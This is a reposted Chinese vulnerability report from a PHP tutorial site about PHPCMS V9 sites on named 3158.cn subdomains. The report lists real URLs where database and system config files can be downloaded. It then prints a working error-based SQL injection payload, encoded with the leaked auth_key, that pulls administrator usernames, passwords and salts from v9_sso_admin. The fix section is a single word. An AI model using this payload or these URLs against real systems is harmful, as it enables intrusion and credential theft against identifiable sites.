来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 财富中国 cn 域所有使用V9的站点,由于配置不当,造成配置文件下载,从而造成信息泄漏及SQL注入等问题。站点大概有:zx.sichuan.3158.cnzx.hlj.3158.cnzx.henan.3158.cnzx.ln.3158.cnzx.guangzhou.3158.cnz...
|
财富中国 cn 域所有使用V9的站点,由于配置不当,造成配置文件下载,从而造成信息泄漏及SQL注入等问题。
站点大概有:
zx.sichuan.3158.cn
zx.hlj.3158.cn
zx.henan.3158.cn
zx.ln.3158.cn
zx.guangzhou.3158.cn
zx.jiangsu.3158.cn
等
http://zx.hlj.3158.cn/caches/configs/database.php
http://zx.hlj.3158.cn/caches/configs/system.php
直接下载
  得知 auth_key 后,可以造成多处SQL注入。
 die(sys_auth(sys_auth("1' and (select 1 from(select count(*),concat(0x7c,(select concat(username,0x7c,password,0x7c,encrypt) from v9_sso_admin limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#\tp",'ENCODE',$auth_key )));
 修复方案:
配置
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
